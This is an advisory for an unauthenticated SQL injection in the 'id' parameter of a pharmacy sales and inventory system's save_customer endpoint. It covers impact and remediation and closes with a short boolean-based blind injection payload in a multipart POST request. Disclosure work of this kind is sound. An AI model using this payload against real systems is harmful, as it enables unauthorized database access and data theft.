# Vulnerability Summary: sourcecodedoster Pharmacy Sales and Inventory System SQL Injection ## Vulnerability Overview * **Product Name**: Pharmacy Sales and Inventory System Project V1.0 * **Vulnerability Type**: SQL Injection * **Affected File**: `/ajax.php?action=save_customer` * **Vulnerable Parameter**: `id` * **Root Cause**: Attackers can inject malicious code via the `id` parameter. Due to lack of proper sanitization or validation, the SQL query is manipulated, allowing forged input values, manipulation of SQL queries, and execution of unauthorized operations. * **Exploitation Condition**: No login or authorization required for exploitation. ## Impact Scope * **Affected Version**: V1.0 * **Potential Hazards**: * Unauthorized database access * Sensitive data leakage * Data tampering * Full system control * Service disruption * Serious threat to system security and business continuity ## Remediation Measures 1. **Use Prepared Statements and Parameter Binding**: Prepared statements separate SQL code from user input data. When using prepared statements, user input values are treated as pure data and will not be interpreted as SQL code. 2. **Input Validation and Filtering**: Strictly validate and filter user input data to ensure it conforms to expected formats. 3. **Minimize Database User Privileges**: Ensure the account used to connect to the database has the minimum necessary privileges. Avoid using accounts with high-level permissions (such as 'root' or 'admin') for routine operations. 4. **Regular Security Audits**: Conduct regular code and system security audits to promptly identify and fix potential security vulnerabilities. ## POC Code ```text ... Parameter: MULTIPART id ((custom) POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: -----------------3738858121816587200387936454 Content-Disposition: form-data; name="id" (SELECT (CASE WHEN (7479=7479) THEN '' ELSE (SELECT 5203 UNION SELECT 7749) END)) -----------------3738858121816587200387936454 Content-Disposition: form-data; name="name" 1111 -----------------3738858121816587200387936454-- ... ```